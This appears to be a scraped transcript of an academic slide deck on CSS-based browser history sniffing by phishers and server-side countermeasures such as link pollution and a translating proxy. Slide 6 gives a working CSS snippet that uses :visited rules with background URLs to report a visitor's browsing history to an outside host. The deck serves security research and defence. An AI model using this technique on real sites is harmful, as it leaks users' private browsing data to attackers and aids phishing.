Presentation is loading. Please wait.

Presentation is loading. Please wait.

Invasive Browser Sniffing and Countermeasures

Published byまいか いまいだ Modified over 5 years ago

Similar presentations

Presentation on theme: "Invasive Browser Sniffing and Countermeasures"— Presentation transcript:

1 Invasive Browser Sniffing and Countermeasures
Markus Jakobsson Sid Stamm Phishing overview Symantec says phishing attacks up by 81 per cent in first half of 2006 The main goal of attacks is to secure confidential information like passwords, login information,ハand addresses to be able to meddle in peopleユs financial affairs # sites (recorded by apwg) in july 2006: 14191

2 His wife Hurry up! His bank His conscience

3 He performed such a transaction
ACH transfer … nice for phisher!

4 First things first: How does the phisher know his wife’s name?
Jagatic, Johnson, Jakobsson, Menczer, “Social Phishing”, To appear in CACM, available at

5 And then: How does the phisher know where he has been?
What you see: The Code: <style> a { color: blue; } #id1:visited { color: red; } #id2:visited { color: red; } #id3:visited { color: red; } </style> <a id=id1 href=“x.com”>Link 1</a> <a id=id2 href=“y.com”>Link 2</a> <a id=id3 href=“z.com”>Link 3</a> Link 1 Link 2 Link 3

6 And then: How does the phisher know where he has been?
Not visible: The Code: <style> a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); </style> <a id=id1 href=“x.com”></a> <a id=id2 href=“y.com”></a> <a id=id3 href=“z.com”></a> Link 1 Link 2 Link 3

7 Architecture of this attack
? Attack is as old as Feb. 2002: Reported recently at Open Web Application Security Project OWASP (9/21/2006) by Jeremiah Grossman (from WhiteHat Security)

8 Connecting to email address
GET (lots of links) Phisher can now associate Alice with link 1 and 42 GET Additionally, address can be obtained through the auto-fill field extraction (see Fil’s riddle site) GET

9 Try it? Try it on a friend? browser-recon.info

10 Where can this be stopped?
User paranoia (clear all) Our approach Jackson, Bortz, Boneh, Mitchell

11 Server-side defense against browser sniffing
Principle I: Avoid correct guesses! Principle II: Cause false positives! add wamu.com, citi.com, etc etc. Entry point pollution consists of all entry points (the anonymity set). • POLLUTION DOES NOT require effort by client, can be done behind-the-scenes

12 Server-side defense against browser sniffing
Principle I: Avoid correct guesses! But what about the portal? Principle II: Cause false positives! But what if they are all stigmatizing?

13 Translating Proxy T SB GET /?13fc021b ST GET / C Domain of S
Now we implement a “Layer” on top of the server, called a Translator. IDEALLY: the two would be on one computer communicating via Loopback interface or other mechanism. WHY: so S_B doesn’t have to change, prevent site programming mistakes, etc C Domain of S

14 Experimental data

15 What I have not mentioned
How do we deal with robot policies? What about search engines, proxies? How do we select false positives? What about links to off-site data? How do we handle bookmarks? What does the prototype do? Please see the paper!

Download ppt "Invasive Browser Sniffing and Countermeasures"

Similar presentations

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Adding New User to Existing Dell Partner Account

Adding New User to Existing Dell Partner Account
Reporter: Jing Chiu Advisor: Yuh-Jye Lee 2015/7/181Data Mining & Machine Learning Lab.

Reporter: Jing Chiu Advisor: Yuh-Jye Lee /7/181Data Mining & Machine Learning Lab.
ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.

ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.
PHAD- A Phishing Avoidance and Detection Tool Using Invisible Digital Watermarking By Sonali Batra Web 2.0 Security and Privacy 2014.

PHAD- A Phishing Avoidance and Detection Tool Using Invisible Digital Watermarking By Sonali Batra Web 2.0 Security and Privacy 2014.
Stronger Password Authentication Using Browser Extensions Blake Ross, Collin Jackson, Nick Miyake, Dan Boneh, John Mitchell Stanford University

Stronger Password Authentication Using Browser Extensions Blake Ross, Collin Jackson, Nick Miyake, Dan Boneh, John Mitchell Stanford University
Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.

Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.
Accounting & Billing System for the WEB Centre GDP 19 Donna Crawford (dc899) Chris O’Neill (ckjon101) Amit Shah (ams401) David Newman (drn101) Supervisor.

Accounting & Billing System for the WEB Centre GDP 19 Donna Crawford (dc899) Chris O’Neill (ckjon101) Amit Shah (ams401) David Newman (drn101) Supervisor.
Delayed Password Disclosure Mutual Authentication to Fight Phishing Steve Myers Indiana University, Bloomington Joint work with: Markus Jakobsson Indiana.

Delayed Password Disclosure Mutual Authentication to Fight Phishing Steve Myers Indiana University, Bloomington Joint work with: Markus Jakobsson Indiana.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
The OWASP Foundation OWASP Chennai 2007 Phishing.

The OWASP Foundation OWASP Chennai Phishing.
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
Telnet/SSH: Connecting to Hosts Internet Technology1.

Telnet/SSH: Connecting to Hosts Internet Technology1.
1 Networks, advantages & types of What is a network? Two or more computers that are interconnected so they can exchange data, information & resources.

1 Networks, advantages & types of What is a network? Two or more computers that are interconnected so they can exchange data, information & resources.
CSC 386 – Computer Security Scott Heggen. Agenda Authentication.

CSC 386 – Computer Security Scott Heggen. Agenda Authentication.
Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm.

Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm.
KAIST Web Wallet: Preventing Phishing Attacks by Revealing User Intentions Min Wu, Robert C. Miller and Greg Little Symposium On Usable Privacy and Security.

KAIST Web Wallet: Preventing Phishing Attacks by Revealing User Intentions Min Wu, Robert C. Miller and Greg Little Symposium On Usable Privacy and Security.
Postacademic Interuniversity Course in Information Technology – Module C1p1 Contents Data Communications Applications –File & print serving –Mail –Domain.

Postacademic Interuniversity Course in Information Technology – Module C1p1 Contents Data Communications Applications –File & print serving –Mail –Domain.
XP New Perspectives on Browser and E-mail Basics Tutorial 1 1 Browser and E-mail Basics Tutorial 1.

XP New Perspectives on Browser and Basics Tutorial 1 1 Browser and Basics Tutorial 1.
Adam Soph, Alexandra Smith, Landon Peterson. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details.

Adam Soph, Alexandra Smith, Landon Peterson. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details.

Similar presentations

Ads by Google